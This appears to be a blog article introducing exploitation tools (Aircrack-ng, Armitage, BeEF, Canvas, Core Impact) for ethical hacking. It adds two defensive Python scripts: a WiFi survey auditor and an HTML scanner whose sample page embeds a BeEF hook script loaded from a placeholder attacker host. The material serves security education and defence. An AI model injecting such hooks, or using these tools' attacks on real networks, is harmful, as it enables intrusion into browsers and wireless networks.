
Exploitation Tools (part 1)

Today we take a look at some tools available for the exploitation of vulnerabilities whilst performing Pentesting or Ethical Hacking.

Recently we published a Poll for voting for the Best Exploitation Tool. In this article we look at the first 6 of those choices to help understand what they do, their main features, some examples, and where to find out more about them.

Aircrack-ng

Aircrack-ng is not a single tool but rather a suite of around 20 tools focused on testing WiFi networks.

Here are the areas covered:

  • Monitoring – capturing packets and saving this data to text files for processing by other 3rd party tools.
  • Attacking – issue replay attacks, deauthentications, create fake Access Points (APs), and other forms of packet injection attacks.
  • Testing – checking Wireless Adapters and driver capabilities such as capturing and injections.
  • Cracking – WEP (Wired Equivalent Privacy) & WPA-PSK (Wi-Fi Protected Access Pre-Shared Key).

All tools are command line, which allows for heavy scripting; a lot of GUIs have taken advantage of this. It works primarily on Linux but also on Windows, OS X, FreeBSD, OpenBSD, NetBSD, Solaris and even eComStation 2.

aircrack-ng.org
Example of preparing a Wireless Adapter for using most of the tools within the ‘aircrack-ng’ suite. Steps include changing the MAC Address and placing it into Monitor mode.
Example of using ‘airodump-ng wlan0’ command to capture WiFi traffic information. MAC Addresses (BSSID) and Access Point names (Probe) have been blurred for privacy.
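The capture described in the screenshots above is normally written to disk (airodump-ng’s -w option produces a CSV file alongside the packet capture) so that other tools can process it. The following script is an added example, not part of the original article or of the aircrack-ng project: it parses a constructed sample in the layout airodump-ng writes (an access-point table, a blank line, then a station table; the column order is assumed from common usage, not taken from this page) and audits it from the defender’s side, flagging open and WEP networks and any BSSID that advertises a managed ESSID without being on the authorized list, which is how a fake Access Point of the kind the suite can create shows up in a survey. The MAC addresses, ESSIDs and timestamps are constructed.

```python
import sys
from typing import Dict, List, Set, Tuple

# Constructed sample in the layout of an airodump-ng "<prefix>-01.csv" file.
# Column order assumed from common usage; all addresses and names are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,    0,   0.  0.  0.  0,  8, CorpWiFi, 
AA:BB:CC:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  11, WEP , WEP , , -60,   30,  500,   0.  0.  0.  0,  9, LegacyNet, 
AA:BB:CC:00:00:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, OPN , , , -70,   80,    0,   0.  0.  0.  0,  5, Guest, 
DE:AD:BE:EF:00:01, 2024-01-01 10:02:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -35,   40,    0,   0.  0.  0.  0,  8, CorpWiFi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -50,   20, AA:BB:CC:00:00:01, CorpWiFi
77:88:99:AA:BB:CC, 2024-01-01 10:01:30, 2024-01-01 10:04:30, -55,    5, (not associated), CorpWiFi,HomeNet
"""


def _split_sections(text: str) -> List[List[str]]:
    """Split the file into blocks of non-blank lines (APs first, then stations)."""
    sections: List[List[str]] = []
    current: List[str] = []
    for line in text.splitlines():
        if line.strip():
            current.append(line)
        elif current:
            sections.append(current)
            current = []
    if current:
        sections.append(current)
    return sections


def _rows(lines: List[str]):
    """Yield data rows as lists of stripped fields, skipping the header line.
    Naive comma splitting: an ESSID containing a comma would shift the columns."""
    for raw in lines[1:]:
        yield [field.strip() for field in raw.split(",")]


def parse_airodump_csv(text: str) -> Tuple[List[Dict], List[Dict]]:
    """Return (access_points, stations) as lists of dicts with the fields we audit."""
    sections = _split_sections(text)
    ap_lines = sections[0] if sections else []
    st_lines = sections[1] if len(sections) > 1 else []
    aps = []
    for f in _rows(ap_lines):
        if len(f) < 14:
            continue
        aps.append({"bssid": f[0].upper(), "channel": f[3], "privacy": f[5],
                    "cipher": f[6], "auth": f[7], "power": f[8], "essid": f[13]})
    stations = []
    for f in _rows(st_lines):
        if len(f) < 6:
            continue
        # "Probed ESSIDs" is itself comma separated, so everything after column 6 belongs to it.
        stations.append({"mac": f[0].upper(), "power": f[3], "packets": f[4],
                         "bssid": f[5].upper(), "probed": [p for p in f[6:] if p]})
    return aps, stations


def audit_access_points(aps: List[Dict], authorized: Dict[str, Set[str]]) -> List[Tuple[str, str, str]]:
    """Return (bssid, essid, finding) for APs a defender should look at.

    authorized maps each managed ESSID to the set of BSSIDs that legitimately serve it;
    any other BSSID beaconing that ESSID is a candidate fake AP / evil twin."""
    findings = []
    for ap in aps:
        privacy = ap["privacy"].upper()
        if privacy == "OPN":
            findings.append((ap["bssid"], ap["essid"], "open network (no encryption)"))
        elif "WEP" in privacy:
            findings.append((ap["bssid"], ap["essid"], "WEP encryption (crackable)"))
        if ap["essid"] in authorized and ap["bssid"] not in authorized[ap["essid"]]:
            findings.append((ap["bssid"], ap["essid"],
                             "unknown BSSID advertising a managed ESSID (possible fake AP)"))
    return findings


def clients_probing_for(stations: List[Dict], essid: str) -> List[str]:
    """Station MACs that probe for the given ESSID while not associated: devices that
    will auto-join any AP answering to that name and so deserve a closer look."""
    return [s["mac"] for s in stations
            if essid in s["probed"] and s["bssid"] == "(NOT ASSOCIATED)"]


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CSV
    aps, stations = parse_airodump_csv(text)
    for bssid, essid, finding in audit_access_points(aps, {"CorpWiFi": {"AA:BB:CC:00:00:01"}}):
        print(f"{bssid}  {essid:<12} {finding}")
    print("probing for CorpWiFi while unassociated:", clients_probing_for(stations, "CorpWiFi"))
```

Run it with a real `<prefix>-01.csv` as the first argument, or with no argument to audit the embedded sample; the authorized BSSID map is the only site-specific input.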

For further details on Aircrack-ng check out the following resources:

Armitage

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

fastandeasyhacking.com

Below are the advantages provided by using Armitage over a single instance of Metasploit:

Through one Metasploit instance, your team will:

  • Use the same sessions.
  • Share hosts, captured data, and downloaded files.
  • Communicate through a shared event log.
  • Run bots to automate red team tasks.
Sample screenshot of Armitage tool front-end courtesy of fastandeasyhacking.com.

Note: This software has not been updated since 2015. Links in the following section may cause a browser security warning!

For further details on Armitage check out the following resources:

BeEF

BeEF stands for ‘The Browser Exploitation Framework’ which is a penetration testing tool targeting web browsers.

…BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors.

…BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

beefproject.com
Example of attacker screen showing online & offline browsers in first column. Target is the Basic Demo (see 2nd tab). Second column shows available modules (attack vectors). Third column shows individual attacks with results in the last column.
Resultant attack of sending an alert popup dialog to the ‘hooked’ target.
Example of a different attack to retrieve target’s web page source HTML.
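The “hook” BeEF relies on is a script tag that a page loads from the attacker’s server; once it runs, every module shown in the screenshots above is executed inside that browser. From the defending side the check is therefore whether a served page loads script from anywhere other than its own origin or an allowlisted CDN. The script below is an added example, not part of the original article or of the BeEF project: it scans a constructed HTML page for script sources, reports those from non-allowlisted hosts plus inline scripts, and builds the matching Content-Security-Policy header. The file name hook.js is BeEF’s default, which this page does not mention; the IP address, hostnames and page content are constructed.

```python
from html.parser import HTMLParser
from typing import List, Set, Tuple
from urllib.parse import urlparse

# Constructed page: two legitimate scripts, one injected from a foreign host
# (hook.js is BeEF's default hook name; the address is a placeholder), one inline.
SAMPLE_HTML = """<!doctype html>
<html><head><title>Demo</title>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
</head><body>
<p>Hello</p>
<script src="http://203.0.113.5:3000/hook.js"></script>
<script>var x = 1;</script>
</body></html>"""


class ScriptCollector(HTMLParser):
    """Collect every <script> as (src, inline_body); src is "" for inline scripts."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Tuple[str, str]] = []
        self._in_inline = False
        self._buf: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src") or ""
        if src:
            self.scripts.append((src, ""))
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self.scripts.append(("", "".join(self._buf).strip()))
            self._in_inline = False


def find_foreign_scripts(html: str, page_host: str, allowed_hosts: Set[str]) -> List[str]:
    """Return script sources a browser would load from a host that is neither the
    page's own origin nor an allowlisted CDN. Inline scripts are reported as
    'inline:' entries because a CSP without 'unsafe-inline' blocks them as well."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if not src:
            findings.append("inline:" + body[:40])
            continue
        host = urlparse(src).hostname  # None for relative URLs such as /static/app.js
        if host is None or host == page_host or host in allowed_hosts:
            continue
        findings.append(src)
    return findings


def csp_header(allowed_hosts: Set[str]) -> str:
    """The policy that makes the browser refuse the foreign and inline scripts found above."""
    sources = " ".join(sorted("https://" + h for h in allowed_hosts))
    return f"Content-Security-Policy: script-src 'self' {sources}".rstrip()


if __name__ == "__main__":
    allowed = {"cdn.example.net"}
    for finding in find_foreign_scripts(SAMPLE_HTML, "demo.example", allowed):
        print("script outside policy:", finding)
    print(csp_header(allowed))
```

Point the scanner at fetched responses (or run it in a CI check over templates) and deploy the header it prints; a browser that enforces it never executes the injected script, so the hook is never established.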

For further details on BeEF check out the following resources:

Canvas

Immunity’s CANVAS makes available hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework to penetration testers and security professionals worldwide.

immunitysec.com
Example of Canvas being able to use multiple hosts running different operating systems on a variety of hardware as pivot points when carrying out attacks.
Canvas can be used either from the GUI (see above) or from the CLI (Command Line Interface), shown in this screenshot.

The above screenshots are courtesy of ImmunitySec.com.

For further details on Canvas check out the following resources:

Core Impact

Core Impact is designed to enable security teams to conduct advanced penetration tests with ease. With guided automation and certified exploits, the powerful penetration testing software enables you to safely test your environment using the same techniques as today’s adversaries.

coresecurity.com

Key features:

  • Guided Automation – RPTs (Rapid Penetration Tests) are designed to automate common & repetitive tasks.
  • Certified Exploits – exploits are validated and held in a library that is updated in real-time. 3rd party exploits are also included.
  • Multi-Vector Testing Capabilities – attacks can be performed across network infrastructure, endpoints, the web, and applications to reveal exploited vulnerabilities.
  • Integrations – Core Impact integrates with a variety of pentesting tools and scanners such as Metasploit, Burp Suite, and OpenVAS.
  • Patented Agents – Core Agents simplify interactions with remote hosts.
  • Robust Error Prevention – agents, as well as products, workspaces and modules/RPTs, can be programmed to self-destruct after testing, saving resources and closing potential backdoors.
  • Teaming – this allows multiple Pentesters to interact within the same session to share data and delegate testing tasks.

For further details on Core Impact check out the following resources:


If you have not yet voted in our poll then please check out the Best Exploitation Tool page.

Check back soon for our upcoming part 2 of this article.

If you have any questions or comments on the above please feel free to add them below.
